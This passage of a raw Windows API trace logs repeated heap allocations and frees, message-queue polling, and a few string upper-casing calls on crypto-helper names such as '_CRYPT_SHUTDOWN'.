RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1600 [0264.891] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef15d0 [0264.891] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xeca838 [0264.891] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1550 [0264.891] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1550 | out: hHeap=0xc60000) returned 1 [0264.891] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef15d0 | out: hHeap=0xc60000) returned 1 [0264.891] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca838 | out: hHeap=0xc60000) returned 1 [0264.891] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1600 | out: hHeap=0xc60000) returned 1 [0264.891] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1500 | out: hHeap=0xc60000) returned 1 [0264.891] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1e20 [0264.891] PeekMessageW (in: lpMsg=0x91f57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f57c) returned 0 [0264.891] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1500 [0264.891] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xca75a8 [0264.891] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1600 [0264.891] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca75a8 | out: hHeap=0xc60000) returned 1 [0264.891] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1600 | out: hHeap=0xc60000) returned 1 [0264.891] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1600 [0264.891] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xeca838 [0264.891] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca838 | out: hHeap=0xc60000) returned 1 [0264.891] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1600 | out: hHeap=0xc60000) returned 1 [0264.891] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1500 | out: hHeap=0xc60000) returned 1 [0264.891] PeekMessageW (in: lpMsg=0x91f57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f57c) returned 0 [0264.891] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1500 [0264.891] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xca75a8 [0264.892] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1600 [0264.892] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca75a8 | out: hHeap=0xc60000) returned 1 [0264.892] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1600 | out: hHeap=0xc60000) returned 1 [0264.892] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1500 | out: hHeap=0xc60000) returned 1 [0264.892] PeekMessageW (in: lpMsg=0x91f57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f57c) returned 0 [0264.892] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1500 [0264.892] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1600 [0264.892] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1600 | out: hHeap=0xc60000) returned 1 [0264.892] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1500 | out: hHeap=0xc60000) returned 1 [0264.892] PeekMessageW (in: lpMsg=0x91f57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f57c) returned 0 [0264.892] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1e20 | out: hHeap=0xc60000) returned 1 [0264.892] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1de0 | out: hHeap=0xc60000) returned 1 [0264.892] PeekMessageW (in: lpMsg=0x91f57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f57c) returned 0 [0264.892] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1500 [0264.892] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1600 [0264.892] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xeca838 [0264.892] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca838 | out: hHeap=0xc60000) returned 1 [0264.892] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1600 | out: hHeap=0xc60000) returned 1 [0264.892] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1500 | out: hHeap=0xc60000) returned 1 [0264.892] PeekMessageW (in: lpMsg=0x91f57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f57c) returned 0 [0264.892] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1500 [0264.892] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb840 [0264.892] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0264.892] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb840 | out: hHeap=0xc60000) returned 1 [0264.892] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1500 | out: hHeap=0xc60000) returned 1 [0264.892] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe83340 [0264.893] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c880 [0264.893] PeekMessageW (in: lpMsg=0x91f324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f324) returned 0 [0264.893] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1500 [0264.893] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xee0cf0 [0264.893] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0264.893] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee0cf0 | out: hHeap=0xc60000) returned 1 [0264.893] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1500 | out: hHeap=0xc60000) returned 1 [0264.893] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe80f10 [0264.893] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c8c8 [0264.893] PeekMessageW (in: lpMsg=0x91f0cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f0cc) returned 0 [0264.893] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1500 [0264.893] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1600 [0264.893] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1600 | out: hHeap=0xc60000) returned 1 [0264.893] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1600 [0264.893] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xeca838 [0264.893] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca838 | out: hHeap=0xc60000) returned 1 [0264.893] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1600 | out: hHeap=0xc60000) returned 1 [0264.893] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1500 | out: hHeap=0xc60000) returned 1 [0264.893] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb840 [0264.893] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe80fa0 [0264.894] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe810f0 [0264.894] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe834a8 [0264.894] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe83670 [0264.894] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe83640 [0264.894] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe81150 [0264.894] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe83658 [0264.894] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe833d0 [0264.894] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1500 [0264.894] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1500 | out: hHeap=0xc60000) returned 1 [0264.894] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1500 [0264.894] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1500 | out: hHeap=0xc60000) returned 1 [0264.894] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1500 [0264.894] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1500 | out: hHeap=0xc60000) returned 1 [0264.894] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe810f0 | out: hHeap=0xc60000) returned 1 [0264.894] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80fa0 | out: hHeap=0xc60000) returned 1 [0264.894] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834a8 | out: hHeap=0xc60000) returned 1 [0264.894] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83670 | out: hHeap=0xc60000) returned 1 [0264.894] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83640 | out: hHeap=0xc60000) returned 1 [0264.894] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81150 | out: hHeap=0xc60000) returned 1 [0264.894] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83658 | out: hHeap=0xc60000) returned 1 [0264.894] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833d0 | out: hHeap=0xc60000) returned 1 [0264.894] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb840 | out: hHeap=0xc60000) returned 1 [0264.894] PeekMessageW (in: lpMsg=0x91f0cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f0cc) returned 0 [0264.894] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c8c8 | out: hHeap=0xc60000) returned 1 [0264.894] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80f10 | out: hHeap=0xc60000) returned 1 [0264.894] PeekMessageW (in: lpMsg=0x91f324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f324) returned 0 [0264.894] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1500 [0264.894] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1600 [0264.895] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xee0cf0 [0264.895] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0264.895] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee0cf0 | out: hHeap=0xc60000) returned 1 [0264.895] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1600 | out: hHeap=0xc60000) returned 1 [0264.895] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe80f10 [0264.895] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c8c8 [0264.895] PeekMessageW (in: lpMsg=0x91ef04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91ef04) returned 0 [0264.895] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1600 [0264.895] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef15d0 [0264.895] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef15d0 | out: hHeap=0xc60000) returned 1 [0264.895] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1600 | out: hHeap=0xc60000) returned 1 [0264.895] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c8c8 | out: hHeap=0xc60000) returned 1 [0264.895] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80f10 | out: hHeap=0xc60000) returned 1 [0264.895] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1600 [0264.895] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xeca838 [0264.895] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca838 | out: hHeap=0xc60000) returned 1 [0264.895] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1600 | out: hHeap=0xc60000) returned 1 [0264.895] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1500 | out: hHeap=0xc60000) returned 1 [0264.895] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1de0 [0264.895] PeekMessageW (in: lpMsg=0x91f324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f324) returned 0 [0264.895] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1de0 | out: hHeap=0xc60000) returned 1 [0264.895] PeekMessageW (in: lpMsg=0x91f324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f324) returned 0 [0264.895] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c880 | out: hHeap=0xc60000) returned 1 [0264.895] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83340 | out: hHeap=0xc60000) returned 1 [0264.895] PeekMessageW (in: lpMsg=0x91f57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f57c) returned 0 [0264.895] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1500 [0264.895] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb840 [0264.896] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83340 [0264.896] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1600 [0264.896] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1600 | out: hHeap=0xc60000) returned 1 [0264.896] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80f10 [0264.896] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1600 [0264.896] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1600 | out: hHeap=0xc60000) returned 1 [0264.896] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe833d0 [0264.896] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1600 [0264.896] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1600 | out: hHeap=0xc60000) returned 1 [0264.896] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83340 | out: hHeap=0xc60000) returned 1 [0264.896] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80f10 | out: hHeap=0xc60000) returned 1 [0264.896] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833d0 | out: hHeap=0xc60000) returned 1 [0264.896] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb840 | out: hHeap=0xc60000) returned 1 [0264.896] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1500 | out: hHeap=0xc60000) returned 1 [0264.896] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c838 | out: hHeap=0xc60000) returned 1 [0264.896] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe832f8 | out: hHeap=0xc60000) returned 1 [0264.896] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83328 | out: hHeap=0xc60000) returned 1 [0264.896] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83310 | out: hHeap=0xc60000) returned 1 [0264.896] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80dc0 | out: hHeap=0xc60000) returned 1 [0264.896] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe832c8 | out: hHeap=0xc60000) returned 1 [0264.896] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80d90 | out: hHeap=0xc60000) returned 1 [0264.896] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1510 | out: hHeap=0xc60000) returned 1 [0264.896] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef3ec8 | out: hHeap=0xc60000) returned 1 [0264.896] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca858 | out: hHeap=0xc60000) returned 1 [0264.896] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe832e0 | out: hHeap=0xc60000) returned 1 [0264.896] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83298 | out: hHeap=0xc60000) returned 1 [0264.896] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb868 | out: hHeap=0xc60000) returned 1 [0264.896] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca7380 | out: hHeap=0xc60000) returned 1 [0264.896] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1530 | out: hHeap=0xc60000) returned 1 [0264.896] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83370 | out: hHeap=0xc60000) returned 1 [0264.897] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83760 | out: hHeap=0xc60000) returned 1 [0264.897] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1690 | out: hHeap=0xc60000) returned 1 [0264.897] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb688 | out: hHeap=0xc60000) returned 1 [0264.897] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83490 | out: hHeap=0xc60000) returned 1 [0264.897] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834c0 | out: hHeap=0xc60000) returned 1 [0264.897] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1620 | out: hHeap=0xc60000) returned 1 [0264.898] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb5c0 | out: hHeap=0xc60000) returned 1 [0264.898] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80ee0 | out: hHeap=0xc60000) returned 1 [0264.898] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1660 | out: hHeap=0xc60000) returned 1 [0264.898] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef3e98 | out: hHeap=0xc60000) returned 1 [0264.898] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1570 | out: hHeap=0xc60000) returned 1 [0264.898] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef50e0 | out: hHeap=0xc60000) returned 1 [0264.898] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca7d8 | out: hHeap=0xc60000) returned 1 [0264.898] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83550 | out: hHeap=0xc60000) returned 1 [0264.898] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80eb0 | out: hHeap=0xc60000) returned 1 [0264.898] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16a0 | out: hHeap=0xc60000) returned 1 [0264.898] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb660 | out: hHeap=0xc60000) returned 1 [0264.898] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811e0 | out: hHeap=0xc60000) returned 1 [0264.898] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb520 | out: hHeap=0xc60000) returned 1 [0264.898] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1630 | out: hHeap=0xc60000) returned 1 [0264.898] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb6b0 | out: hHeap=0xc60000) returned 1 [0264.898] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83718 | out: hHeap=0xc60000) returned 1 [0264.899] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81030 | out: hHeap=0xc60000) returned 1 [0264.899] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1610 | out: hHeap=0xc60000) returned 1 [0264.899] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb5e8 | out: hHeap=0xc60000) returned 1 [0264.899] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe835c8 | out: hHeap=0xc60000) returned 1 [0264.899] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb638 | out: hHeap=0xc60000) returned 1 [0264.899] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xc60000) returned 1 [0264.899] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb750 | out: hHeap=0xc60000) returned 1 [0264.899] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83358 | out: hHeap=0xc60000) returned 1 [0264.899] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe810c0 | out: hHeap=0xc60000) returned 1 [0264.899] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef15e0 | out: hHeap=0xc60000) returned 1 [0264.899] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb610 | out: hHeap=0xc60000) returned 1 [0264.899] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe835f8 | out: hHeap=0xc60000) returned 1 [0264.899] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb7a0 | out: hHeap=0xc60000) returned 1 [0264.899] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef15f0 | out: hHeap=0xc60000) returned 1 [0264.899] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb778 | out: hHeap=0xc60000) returned 1 [0264.899] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83730 | out: hHeap=0xc60000) returned 1 [0264.899] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb700 | out: hHeap=0xc60000) returned 1 [0264.899] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 | out: hHeap=0xc60000) returned 1 [0264.899] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb6d8 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83508 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1670 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83520 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe835b0 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1720 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb570 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83610 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb7f0 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16f0 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb7c8 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83430 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83418 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb818 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83568 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17c0 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1760 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16b0 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17b0 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb4d0 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81420 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16e0 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81000 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81090 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80fd0 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83598 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb4f8 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1820 | out: hHeap=0xc60000) returned 1 [0264.900] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe837d8 | out: hHeap=0xc60000) returned 1 [0264.901] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17d0 | out: hHeap=0xc60000) returned 1 [0264.901] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0264.901] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17d0 [0264.901] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xca7380 [0264.901] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1820 [0264.901] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca7380 | out: hHeap=0xc60000) returned 1 [0264.901] HeapFree 